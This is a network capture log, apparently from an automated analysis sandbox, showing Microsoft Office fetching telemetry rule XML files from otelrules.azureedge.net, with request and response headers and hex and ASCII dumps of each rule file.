                                                2024-10-29 23:23:07 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:07 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:07 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1366
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                ETag: "0x8DC582BDF1E2608"
                                                x-ms-request-id: 6d89998c-401e-0083-425b-26075c000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232307Z-17c5cb586f6gkqkwd0x1ge8t0400000007vg0000000009cd
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:07 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                125192.168.2.45817113.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:07 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:07 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:07 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1399
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                ETag: "0x8DC582BE8C605FF"
                                                x-ms-request-id: dc5d0bf8-001e-008d-6cee-26d91e000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232307Z-r197bdfb6b46krmwag4tzr9x7c000000071000000000c814
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:07 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                126192.168.2.45817213.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:07 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:07 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:07 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1362
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                ETag: "0x8DC582BDF497570"
                                                x-ms-request-id: 7b68ac53-d01e-0082-7e67-27e489000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232307Z-16849878b78qwx7pmw9x5fub1c000000059g00000000n3sc
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:07 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                127192.168.2.45817313.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:07 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:08 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:08 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1403
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                ETag: "0x8DC582BDC2EEE03"
                                                x-ms-request-id: 5c4d015b-701e-0097-6b71-28b8c1000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232308Z-15b8d89586fqj7k5h9gbd8vs98000000089g00000000gm1u
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:08 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                128192.168.2.45817513.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:08 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:08 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:08 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1399
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                ETag: "0x8DC582BE1CC18CD"
                                                x-ms-request-id: 5383d0ca-b01e-0053-2a56-26cdf8000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232308Z-r197bdfb6b46kdskt78qagqq1c00000007k0000000000rbg
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:08 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                129192.168.2.45817413.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:08 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:08 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:08 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1366
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                ETag: "0x8DC582BEA414B16"
                                                x-ms-request-id: 68df6217-401e-0029-6d9c-279b43000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232308Z-16849878b78p49s6zkwt11bbkn00000006s000000000ypgg
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:08 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                130192.168.2.45817613.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:08 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:08 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:08 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1362
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                ETag: "0x8DC582BEB256F43"
                                                x-ms-request-id: 38ae9a1e-e01e-0099-4193-27da8a000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232308Z-r197bdfb6b4hsj5bywyqk9r2xw00000008t0000000001bbn
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:08 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                131192.168.2.45817713.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:08 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:08 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:08 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1403
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                ETag: "0x8DC582BEB866CDB"
                                                x-ms-request-id: 6d58be1b-301e-0052-189d-2765d6000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232308Z-r197bdfb6b4gx6v9pg74w9f47s000000097000000000hrn5
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:08 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                132192.168.2.45817813.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:08 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:08 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:08 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1366
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                ETag: "0x8DC582BE5B7B174"
                                                x-ms-request-id: c9c29ab6-a01e-0032-2092-291949000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232308Z-17c5cb586f6f8m6jnehy0z65x400000006n00000000003kc
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:08 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                133192.168.2.45818013.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:09 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:09 UTC584INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:09 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1362
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                ETag: "0x8DC582BDC13EFEF"
                                                x-ms-request-id: a9595a72-801e-0015-2bad-26f97f000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232309Z-16849878b786jv8w2kpaf5zkqs000000062g00000000fprn
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache-Info: L1_T2
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:09 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                134192.168.2.45817913.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:09 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:09 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:09 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1399
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                ETag: "0x8DC582BE976026E"
                                                x-ms-request-id: 338a3e6d-c01e-0079-709c-27e51a000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232309Z-16849878b78fkwcjkpn19c5dsn000000067g00000000cry1
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
